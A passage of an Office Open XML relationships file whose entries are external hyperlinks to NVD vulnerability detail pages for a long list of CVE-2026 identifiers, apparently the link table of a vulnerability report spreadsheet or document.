Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86074" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId995" /><Relationship 